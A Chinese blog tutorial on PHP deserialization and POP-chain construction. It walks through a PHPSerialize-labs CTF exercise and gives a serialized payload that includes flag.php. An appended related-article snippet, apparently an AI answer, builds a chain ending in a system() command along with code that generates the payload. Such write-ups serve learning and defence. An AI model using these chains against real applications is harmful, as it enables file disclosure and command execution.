PHP序列化/反序列化-POP链构造

最新推荐文章于 2025-04-14 19:45:13 发布
最新推荐文章于 2025-04-14 19:45:13 发布
阅读量855 收藏 9
点赞数 20
文章标签: php android java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_81090171/article/details/146183233
版权

 一.什么是php序列化

序列化:对象转换成数组或字符串等格式

形式:O:4:"info”:2:{s:4:“name”;i:2:“19”;}

  • O代表object,4为对象长度

  • info为对象名称

  • 2为该对象中变量的个数

  • s为string类型

  • 4为变量长度

  • name为变量名

  • i代表int,后面同上.

序列化方法:serialize()

<?php
class Animal {
    public $name;
    public $age;

    public function __construct($name, $age) {
        $this->name = $name;
        $this->age = $age;
    }
}

$cat = new Animal("mini", 12);
echo serialize($cat);
?>

运行结果:O:6:"Animal":2:{s:4:"name";s:4:"mini";s:3:"age";i:12;}

二.什么是反序列化

反序列化:将数组和字符串转换成对象.

反序列化方法:unserialize()

<?php
class Animal {
    public $name;
    public $age;

    public function __construct($name, $age) {
        $this->name = $name;
        $this->age = $age;
    }
}

$a = unserialize('O:6:"Animal":2:{s:4:"name";s:4:"mini";s:3:"age";i:12;}');
var_dump($a);
?>

最后结果就是未编译前的代码

三.魔术方法

什么是魔术方法?

魔术方法是一种特殊的方法,当对对象执行某些操作时会覆盖 PHP 的默认操作。

常见的一些魔术方法及使用:

以下是php常见的魔术方法:

  • _construct:构造函数,在创建对象时,会自行调用。
  • _destruct:析构函数,在对象的所有引用都被删除时或者对象被销毁时调用。
  • _wakeup:进行unserialize时会查看是否有该函数,有的话有限调用,进行初始化对象。
  • _toString:当一个类被当成字符串时会被调用。
  • _sleep:当一个对象被序列化时调用,可与设定序列化时保存的属性。
  • _isset():检测对象的某个属性是否存在是执行此函数.当对不可访问属性调用isset()或empty()时.会触发_isset().
  • _unset():当在不可访问的属性上使用unset()时触发 销毁对象的某个属性是执行此函数
  • _INVOKE():将对象当作函数来使用时执行此方法,通常不建议这样做.
  • _get():用于从不可访问的属性读取数据
  • _set():用于将数据写入不可访问的属性
  • _callStatci():在静态上下文中调用不可访问的方法时触发
  • _call():在对象上下文中调用不可访问的方法时触发

反序列化利用大概分为三类:

  • 魔术方法的调用逻辑-如触发条件
  • 语言原生类的调用逻辑-如SoapClient
  • 语言自身的安全缺陷-如CVE-2016-7124

 反序列化例题-POP链构造:

这里以PHPSerialize-labs中class06为例:

在反序列化中我们只能控制成员变量的值,类中的成员方法不可改变,所以在构造payload时成员方法可以去掉,只留下成员变量.

下面是构造代码:

 建议新手手搓增加熟练度,这里为了方便使用代码输出.

pop链构造:

下面以PHPSerilize-labs中class13为例进行说明:

 <?php
//flag is in flag.php
highlight_file(__FILE__);
error_reporting(0);
class Modifier {
    private $var;
    public function append($value)
    {
        include($value);
        echo $flag;
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __toString(){
        return $this->str->source;
    }
    public function __wakeup(){
        echo $this->source;
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    unserialize($_GET['pop']);
}
?>
  • 先看到append方法中有echo $flag,但所有代码中,没有flag这个变量,即flag是在包含文件value中的.又由提示可知,flag在flag.php中,即只要value为flag.php即可,但append方法并非魔术方法,不可以自行调用,所以需要其他魔术方法调用append方法.
  • 再次观察代码,发现_invoke魔术方法中调用了append方法,由上面可以知道_invoke的触发条件为将对象当作函数来使用时执行此方法时触发,又见此处append方法中的参数为var,即只要私有属性var的值和value一致为flag.php即可.
  • 在Test类中可以看到将function当成函数来使用,即触发_get方法来触发_invoke方法,为变量p创建Modifier对象从而触发_invoke方法.已知_get方法的触发条件为用于从不可访问的属性读取数据,发现可以为Show类中的str变量新建一个实例,达到不可访问source属性从而触发_get方法,因为test类中没有source成员属性.
  • _toString的触发条件为当一个类被当成字符串时会被调用。只剩一个_wakeup方法未被调用,且echo $this -> source 当作字符串使用,则为source赋值一个show类实例._wakeup魔术方法的触发条件极其简单进行unserialize时会查看是否有该函数,有的话有限调用,进行初始化对象。

那么POP链就为:

  • var=flag.php再创建Modifier对象
  • 为Test类创建对象,从而触发_invoke魔术方法
  • 触发_get魔术方法,为str赋值test对象
  • 将show类对象赋值给source属性,达到触发toString的条件从而完成构造

因为wakeup魔术方法只要出现,反序列化时就会自动触发,所以不用特意触发

因为在序列化过程中我们只能控制成员属性的值,成员方法等不能做出更改,所以构造时可以删除成员方法等.

以下为构造过程:

最后需要注意O:4:"Show":2:{s:6:"source";r:1;s:3:"str";O:4:"Test":1:{s:1:"p";O:8:"Modifier":1:{s:13:" Modifier var";s:8:"flag.php";}}}

其中的两个空格需要用%00进行替换,或者直接使用echo urlencode(serialize($c));进行输出

Coisini_hfnu
关注
PHP反序列化
2201_75572825的博客
08-23 1055
搜索get_file发现,Show-> tostring中存在代码:$content=$this->class1->get_file($this->var);但是,由于你给的是一个畸形的序列化字符串,总之他是不标准的,所以PHP对这个畸形序列化字符串得到的对象不放心,于是PHP就要赶紧把它清理掉,那么就触发了他的析构方法(_destruct( ))。这样就完成了pop构造。搜索 getFlag,发现 Seri->_destruct( )中存在代码$this->alize->getFlag();
PHP反序列化漏洞POP调用构造
没有网络安全就没有国家安全
08-29 912
本篇文章主要讲解PHP反序列化漏洞POP调用构造
PHP反序列化--pop
2302_79800344的博客
03-18 2061
pop知识是PHP反序列化模块不可或缺的组成部分
PHP反序列化
最新发布
ALe0721的博客
04-14 852
PHP 里,序列化是把一个对象或数组转换成字符串的过程(比如保存到文件或传输到网络),而反序列化就是把这个字符串还原成原来的变量(对象/数组)。// 序列化// 反序列化Phar(PHP Archive)是一种压缩包格式,允许 PHP 把一堆文件打包成一个.phar文件,像.zip一样可以解压,也可以当成普通文件一样 include、访问。Phar 归档中可以携带元数据(metadata),这个 metadata 是以 PHP 序列化格式保存。
PHP反序列化构造POP小练习
末初 · mochu7
05-13 1027
一个师傅给的源码,来源不知,就当作小练习记录一下 <?php error_reporting(0); class Vox{ protected $headset; public $sound; public function fun($pulse){ include($pulse); } public function __invoke(){ $this->fun($this->headset); } } .
php反序列化中的pop
2401_82388450的博客
06-03 1387
反序列化中,我们能控制的数据就是对象中的属性值(成员变量),所以在php反序列化中有一种漏洞利用方法叫“面向属性编程”,即pop(property oriented programming)。PHP反序列化_在线反序列化-优快云博客pop就是利用魔术方法在里面进行多次跳转然后获取敏感数据的一种playload.1.构造pop,需要先分析代码2.找到pop的开端,再使用反推法,一个一个魔术方法的绕过3.能够理解魔术方法的触发条件。
PHP 魔术方法浅谈
ansong8919的博客
03-23 253
php中把以两个下划线(__)开头的方法称之为魔术方法。魔术方法包括: __construct() 类的构造方法 构建方法时被调用 __destruct() 类的析构方法 明确销毁对象或脚本结束时被调用 __call() 在一个类中调用一个不可访问或不存在的方法时使用 __callStatic() 调用不可访问或者是不存在的静...
适合新手的php反序列化pop构建思路和原理(有例题,无echo调用tostring)
2301_76690905的博客
10-24 1551
对于这个pop的执行过程,可以进一步详细解释。首先,让我们逐步追踪反序列化的过程:反序列化开始时,会先对最内层的对象a进行反序列化,即将‘a进行反序列化,即将‘var_1属性赋值为字符串然后,对对象d进行反序列化,它的‘d进行反序列化,它的‘p__get()`函数,返回对象$a的结果。接下来是对象c的反序列化,其中‘c的反序列化,其中‘z__get()__get()`函数,将对象a返回给对象a返回给对象c。最后,对对象b进行反序列化,它的‘b进行反序列化,它的‘q__wakeup()函数。
php反序列化1_常见php序列化的CTF考题
书山有路勤为径,学海无涯苦作舟
11-25 1800
本质上serialize()和unserialize()在php内部的实现上是没有漏洞的,漏洞的主要产生是由于应用程序在处理对象,魔术函数以及序列化相关问题时导致的。当传给unserialize()的参数可控时,那么用户就可以注入精心构造的payload当进行反序列化的时候就有可能会触发对象中的一些魔术方法,造成意想不到的危害。__toString() 是魔术方法的一种,具体用途是当一个对象被当作字符串对待的时候,会触发这个魔术方法以下说明摘自PHP官方手册。
060 PHP反序列化&POP构造&魔术方法流程&漏洞触发条件&属性修改
qq_16163981的博客
08-09 320
如果一个对象类中存在__toString魔术方法,这个对象类被当做字符串进行处理时,就会触发__toString魔术方法。// echo '__get 不存在成员变量'.$name.'<br>';// // __get():访问不存在的成员变量时调用。//// 不存在成员变量spaceman,所以调用__get。////将对象当做函数调用 触发__invoke魔术方法。// 不存在xiaodi方法 触发__call魔术方法。//// 存在成员变量n,所以不调用__get。
通过[NewStarCTF 2023 公开赛道]POP Gadget,精析PHP反序列化POP构造(新手可学习)
2301_79575827的博客
04-24 1584
php反序列化POP详细构造
php反序列化pop一则
dengzhasong7076的博客
07-27 409
跟随wupco师傅学习 classes.php <?php class OutputFilter { protected $matchPattern; protected $replacement; function __construct($pattern, $repl) { $this->matchPattern = $pattern; $...
php反序列化漏洞之pop
weixin_60719780的博客
02-08 2480
常用于上层语言构造特定调用的方法,与二进制利用中的面向返回编程(Return-Oriented Programing)的原理相似,都是从现有运行环境中寻找一系列的代码或者指令调用,然后根据需求构成一组连续的调用,最终达到攻击者邪恶的目的。类似于PWN中的ROP,有时候反序列化一个对象时,由它调用的__wakeup()中又去调用了其他的对象,由此可以溯源而上,利用一次次的 " gadget " 找到漏洞点。把魔术方法作为最开始的小组件,然后在魔术方法中调用其他函数(小组件),通过寻找相同名字的函数,再与
php反序列化pop构造
m0_62422842的博客
04-06 8213
前言 随着对反序列化学习的不断深入,我们来学习一下pop构造。这个pop对于我这种小白来说还是比较难理解的,再次写下这篇文章总结一下,加深自己对构造pop的理解。同时也是提供想要入坑的小伙伴们一些理解。 pop构造 一般的反序列化题目,存在漏洞或者能注入恶意代码的地方在魔术方法中,我们可以通过自动调用魔术方法来达到攻击效果。但是当注入点存在普通的类方法中,通过前面自动调用的方法就失效了,所以我们需要找到普通类与魔术方法之间的联系,理出一种逻辑思路,通过这种逻辑思路来构造一条pop,从而达到
php反序列化pop构造(基于重庆橙子科技靶场)
Welcome To Myon'Blog !
01-16 1551
_toString() //当对象被当做字符串时自动调用(找echo $this->a这种、strtolower()等)__get() //调用类中不存在变量时触发(找有连续箭头的 this->a->b)__invoke() //对象被当做函数进行调用时触发(找有括号的类似$a()这种)__isset() //在不可访问的属性上调用isset()或empty()触发。__unset() //在不可访问的属性上使用unset()时触发。
php反序列化学习(中)--pop构造
qq_75120258的博客
04-24 1614
打开环境,进行代码审计这一题我们需要构造pop,既然要构造pop,我们就要找到头和尾(从尾在到头,一步一步的看,这样就思路清晰了)我们先去找尾,我们需要通过这个file_get_contents()函数来获得flag。
php反序列化&基本pop构造&魔术方法流程&漏洞触发条件&属性修改&属性类型特征&CVE绕过漏洞&字符串逃逸&原生类
m0_70535581的博客
07-13 2133
PHP中的反序列化(unserialization)是将序列化(serialization)后的数据重新转换为PHP对象或数据结构的过程。序列化是将PHP对象转换为可以存储或传输的字符串表示形式的过程,而反序列化则是将这些字符串再转换回原始的PHP对象或数据结构。解释:为了解决开发中数据传输和数据解析的一个情况(例如购买组装电脑,发货过来都是单个零件的,到货之后再重新组装起来)
反序列化学习之PHP反序列化&POP构造
wz0819529的博客
10-21 3753
反序列化学习(一) 前言 反序列化漏洞的学习贯穿了我的整个网安学习过程,从刚开始参加纳新考核到现在,反序列化的题目一直是难题,挡在学习的路上。 这次刷完了ctfshow的反序列化漏洞的相关题目,打算借这次机会重新总结一遍反序列化漏洞的相关知识。 反序列化漏洞的种类非常的多,在很多语言环境下你都会发现序列化储存信息的方式,所以反序列化漏洞也出现在了各种情况下。 总结一下: PHP反序列化漏洞 session反序列化 Phar反序列化漏洞 Python反序列化漏洞
php序列化反序列化pop
03-14
<think>好的,我现在需要帮助用户理解PHP反序列化POP攻击原理和实现方式。首先,我得回顾一下PHP序列化反序列化的基础知识。序列化是将对象转换为字符串,以便存储或传输,反序列化则是将这些字符串重新转换为对象。在这个过程中,如果攻击者能够控制反序列化的数据,就可能触发一些恶意行为。 接下来,POP攻击的关键在于利用类中的魔术方法。魔术方法如__destruct、__wakeup等,在对象生命周期的特定时刻会被自动调用。攻击者需要找到这些方法的调用,使得在反序列化过程中依次触发这些方法,最终执行恶意代码。例如,__destruct方法可能调用某个方法,而该方法又调用另一个存在漏洞的方法,形成式调用。 现在,我需要考虑如何构造一个具体的示例。比如,假设有一个类Example类,它的__destruct方法会调用$this->handler->close()。如果handler是另一个类FileManager的实例,而FileManager的close方法中有执行系统命令的代码,那么攻击者可以通过构造特定的序列化数据,将handler指向FileManager,并设置要执行的命令,从而在反序列化时触发命令执行。 然后,根据用户提供的引用,特别是引用[4]提到的POP的概念,需要将各个类的属性和方法串联起来。引用[2]提到处理protected和private属性时需要进行URL编码,避免解析错误。所以在构造序列化字符串时,需要注意这些格式问题,确保payload正确。 还要考虑漏洞利用的实际场景,比如反序列化入口点可能出现在Cookie、Session或数据传输中。攻击者需要找到这些入口,并注入恶意序列化数据。引用[5]中的例子涉及利用TemplatesImpl类,说明实际应用中可能会调用某些存在危险方法的类。 最后,我需要整理这些思路,分步骤解释POP构造过程,并给出一个代码示例,展示如何序列化恶意对象,并处理属性修饰符的问题。同时,生成相关问题,帮助用户进一步深入学习。</think>### PHP反序列化POP攻击原理及实现方式 #### 1. 核心机制 PHP反序列化POP攻击的核心在于**利用类的魔术方法(Magic Methods)和对象属性之间的调用关系**,构造一条从反序列化触发点到危险函数的调用(Property-Oriented Programming Chain)[^4]。当恶意构造序列化数据被反序列化时,会自动触发这些魔术方法,最终执行攻击者预设的代码。 #### 2. 关键步骤 1. **魔术方法触发** 常见触发点包括: - `__destruct()`:对象销毁时触发 - `__wakeup()`:反序列化时触发 - `__toString()`:对象被当作字符串使用时触发 2. **调用构造** 通过控制对象属性,使一个魔术方法调用另一个类的方法,形成式调用。例如: ``` A::__destruct() -> B::save() -> C::exec() ``` 3. **危险函数调用** 最终触发如`system()`、`eval()`、`file_put_contents()`等函数。 #### 3. 示例漏洞利用 假设存在以下三个类: ```php class FileManager { private $cmd; public function __construct($cmd) { $this->cmd = $cmd; } public function save() { system($this->cmd); // 危险函数 } } class Logger { public $handler; public function close() { $this->handler->save(); } } class Example { protected $obj; public function __destruct() { $this->obj->close(); // 触发点 } } ``` **攻击构造过程**: 1. 通过`Example::__destruct()`触发`Logger::close()` 2. `Logger::close()`调用`FileManager::save()` 3. `FileManager::save()`执行系统命令 **序列化payload生成**: ```php $file = new FileManager("id > /tmp/pwned"); $logger = new Logger(); $logger->handler = $file; $exp = new Example(); $exp->obj = $logger; // 处理protected属性格式 $payload = str_replace( ["\0*\0", "\0Example\0"], ['\00*\00','\00Example\00'], serialize($exp) ); echo urlencode($payload); // 需URL编码处理特殊字符[^2] ``` #### 4. 漏洞利用条件 1. 存在可被控制的反序列化入口(如`unserialize($_COOKIE['data'])`) 2. 目标代码中包含包含危险方法的类 3. 类之间存在可串联的调用关系
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值